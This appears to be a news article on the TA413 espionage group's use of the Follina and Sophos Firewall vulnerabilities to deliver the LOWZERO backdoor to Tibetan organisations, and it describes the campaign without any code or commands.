A Chinese-affiliated APT group called TA413 has exploited the recently revealed vulnerability in MS Office and Sophos Firewall to launch a newly discovered payload called LOWZERO backdoor.
Researchers claimed that this recent introduction of a new backdoor is part of an espionage campaign against Tibetan-based organisations. Based on reports, the primary targets of the espionage hackers have been organisations that have links to the Tibetan community, especially the Tibetan government-in-exile.
The breach sported the exploitation of the Follina flaw and CVE-2022-1040. Both vulnerabilities are RCE in MS Office and Sophos Firewall, respectively. According to the researchers, the Chinese-backed hackers are willing to include new TTPs for initial access to rapidly execute their attacks against Tibet.
The LOWZERO backdoor was developed by its authors solely to attack the Tibetan community.
Based on reports, the TA413 has constantly been attacking the Tibetan community since 2020 using multiple sets of payloads such as FriarFox, ExileRAT, and Sepulcher. Today, the LOWZERO backdoor is the newest addition to the group’s toll for cyberespionage.
The cyberespionage group’s exploitation of the Follina vulnerability was discovered in June this year. However, researchers have not identified the reason for the exploitation. Now, it became clear why the group abused the flaw.
Furthermore, TA413 used spear-phishing tactics last May. This phishing attack is a compromised RTF document that exploited several flaws in MS Equation Editor to deploy the custom LOWZERO backdoor implant.
Another phishing email sent to a Tibetan entity last May was a Word attachment hosted on Google Firebase service that tried to leverage the Follina flaw to run a PowerShell command developed to download the backdoor from afar.
Analysts explained that the LOWZERO backdoor could receive additional commands from its C2 server if the compromised devices are worthy of the interest of the earlier mentioned threat group.
Cybersecurity experts stated that the group continues to add new features while also depending on tried-and-tested TTPs. Unfortunately, TA413’s application of zero-day and disclosed vulnerabilities imply that it could adopt any trend that will be useful for its cyberespionage campaign against its targeted organisations.